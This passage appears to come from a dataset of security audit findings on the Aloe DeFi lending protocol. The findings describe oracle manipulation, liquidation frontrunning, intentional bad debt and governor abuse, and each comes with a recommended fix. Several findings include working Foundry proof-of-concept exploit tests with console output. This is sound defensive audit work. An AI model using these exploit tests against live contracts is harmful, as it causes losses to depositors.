accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. 
seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` haing a corrupted value. 
Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).чThe `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.чThe corrupted values are then used in the further calculations in `Oracle.consult` which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liquidity.\\nBesides that there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing observation cardinality, the severity of this finding is \"High\".
seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n -It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidationчhighч`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidation` clears the warning regardless of whether account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically keeping 
the position, but clearing the warning\\n account.liquidate(this, bytes(\"\"), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: \"Aloe: grace\")\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n}\\n```\\nчConsider clearing \"warn\" status only if account is healthy after liquidation.чVery important protocol function (liquidation) can be DOS'ed and make the unhealthy accounts avoid liquidations for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt causing loss of funds for all protocol users as they will not be able to withdraw their funds and can cause a bank run - first users will be able to withdraw, but later users won't be able to withdraw as protocol won't have enough funds for this.ч```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n -`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transactionчhighчPossible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact this is already 
a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. This bad debt is the amount of funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit large amount to lender before these steps, meaning the inflated interest rate will be accrued by user's deposit to lender, but it will not be paid by the user due to bad debt (user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of accrued 630 DAI, for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from \"src/libraries/constants/Constants.sol\";\\nimport {Q96} from \"src/libraries/constants/Q.sol\";\\nimport {zip} from \"src/libraries/Positions.sol\";\\n\\nimport \"src/Borrower.sol\";\\nimport \"src/Factory.sol\";\\nimport \"src/Lender.sol\";\\nimport \"src/RateModel.sol\";\\n\\nimport {FatFactory, VolatilityOracleMock} from \"./Utils.sol\";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ?
_A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(\"mainnet\"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the 
\"extra\" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n emit log_named_uint(\"Before liquidation User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Before liquidation User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(\"Before liquidation User assets:\", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 
200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(\"\"));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(\"\"));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 
10630197795010000000000\\n Before liquidation User stored borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end user debt is 579 DAI with 0 assets.чConsider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.чMalicious user can create bad debt to his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out to all users, it can cause bank run since first users to withdraw from lender will be able to do so, while those who are the last to withdraw will lose their funds.ч```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from \"src/libraries/constants/Constants.sol\";\\nimport {Q96} from \"src/libraries/constants/Q.sol\";\\nimport {zip} from \"src/libraries/Positions.sol\";\\n\\nimport \"src/Borrower.sol\";\\nimport \"src/Factory.sol\";\\nimport \"src/Lender.sol\";\\nimport \"src/RateModel.sol\";\\n\\nimport {FatFactory, VolatilityOracleMock} from \"./Utils.sol\";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? 
_A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(\"mainnet\"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the 
\"extra\" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n emit log_named_uint(\"Before liquidation User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Before liquidation User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(\"Before liquidation User assets:\", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 
200000000000000000);\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\n }\n }\n\n // ILiquidator\n receive() external payable {}\n\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\n /*\n uint256 expected = abi.decode(data, (uint256));\n if (expected == type(uint256).max) {\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\n }\n assertEq(actual, expected);\n */\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""));\n }\n\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\n /*\n uint256 expected = abi.decode(data, (uint256));\n if (expected == type(uint256).max) {\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\n }\n assertEq(actual, expected);\n */\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""));\n }\n\n // IUniswapV3SwapCallback\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\n }\n\n // Factory mock\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\n ante = DEFAULT_ANTE;\n nSigma = DEFAULT_N_SIGMA;\n }\n\n // (helpers)\n function _setInterest(Lender lender, uint256 amount) private {\n bytes32 ID = bytes32(uint256(1));\n uint256 slot1 = uint256(vm.load(address(lender), ID));\n\n uint256 borrowBase = slot1 % (1 << 184);\n uint256 borrowIndex = slot1 >> 184;\n\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\n vm.store(address(lender), ID, bytes32(newSlot1));\n }\n}\n```\n -IV Can be Decreased for FreeчhighчThe liquidity at a single `tickSpacing` is used to calculate the `IV`. 
The more liquidity is in this tick spacing, the lower the `IV`, as demonstrated by the `tickTvl` dividing the return value of the `estimate` function:\n```\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\n```\n\nSince this is using data only from the block in which the function is called, the liquidity can easily be increased by:\ndepositing a large amount of liquidity into the `tickSpacing`\ncalling update\nremoving the liquidity\nNote that only a small portion of the total liquidity in the entire pool is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contrast this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE` which limits the amount that IV can be manipulated per update does not sufficiently disincentivise manipulation, it just extends the time period required to manipulate.\nDecreasing the IV increases the LTV, and due to the free cost, it's reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. 
With the delay inherent in TWAP oracle and the liquidation delay by the warn-then-liquidate process, this manipulation can turn price change based insolvency from a 5 sigma event (as designed by the protocol) to a likely event.чUse the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.чDecreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.ч```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n -governor can permanently prevent withdrawals in spite of being restrictedчmediumчQuoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. 
We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set a interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel` such as to not damage users of the protocol which is in line with how the `governor` role is described in the README.\\nHowever the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds for a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).чThe `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.чThe `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.ч```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. 
It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\n```\n -Uniswap Formula Drastically Underestimates VolatilityчmediumчNote: This report will use annualised IV expressed in %, even though the code representation uses different scaling.\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued the same as "selling a straddle", which is a short-volatility strategy that involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanent loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a uniswap position is above the fair IV, then it is profitable to be a liquidity provider; if it is lower, then it is not.\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\nThe assumptions of the efficient market hypothesis hold true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this. 
If you are not already a liquidity provider, there is no way to provide "negative liquidity" or "short a liquidity position".\nIn fact the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table which shows the derived IV at time of writing having far lower results than the historical volatilities and the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\nHere is a quote from that exact article, which points out that the Uniswap derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\n```\n"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\n\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets."\n```\n\nThe `IV's` in options markets or protocols that have long-short mechanisms such as Opyn's Squeeth have a correction mechanism for `IV's` which are too low, because you can both buy and sell options, and are therefore "correct" according to Efficient Market Hypothesis. The Uniswap pool is a "long-only" market, where liquidity can be added, but not shorted, which leads to systematically lower `IV` than is realistic. The EMH model, both in soft and hard form, only holds when there is a mechanism for a rational minority to profit off correcting a market imbalance. 
If many irrational or utilitarian users deposit too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, there's no way to profit off correcting this imbalance.\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\nOn chain data which shows that the liquidity and fee derivation from Uniswap gives far lower results than other sources\nThe table provided in Lambert Guillaume's article, which shows Uniswap pool derived IVs which are far lower than the historical volatilities of the asset.\nStudies showing that liquidity providers suffer far more impermanent loss than fees.ч2 possible options (excuse the pun):\nUse historical price differences in the Uniswap pool (similar to a TWAP, but Time Weighted Average Price Difference) and use that to infer volatility alongside the current implementation which is based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The 2 `IV` calculations can be used to "sanity check" the other, to correct one which drastically underestimates the risk\nSame as above, use the `maximum` of the fee/liquidity derived `IV` but use a market that has long/short possibilities such as Opyn's Squeeth to sanity check the `IV`.чThe lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol which is basically an impossibility, becomes possible/likely as the relationship between `IV` or `Pr(event)` is super-linear
For example, the account has 150 DAI borrowed, but only 100 DAI assets.\nBob tries to `liquidate` Alice account, but his transaction reverts, because remaining DAI liability after repaying 100 DAI assets Alice has, will be 50 DAI bad debt. `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI sending it 0.03 WETH. However, since Alice account has 0 WETH, the transfer will revert.\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has 0.02 ETH net loss from liquidation (in addition to gas fees).\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice account won't be liquidated and a borrow of 150 will be stuck in Alice account for a long time. 
Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User assets:\", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n emit log_named_uint(\"Liquidated User ante:\", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\nчConsider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator its 
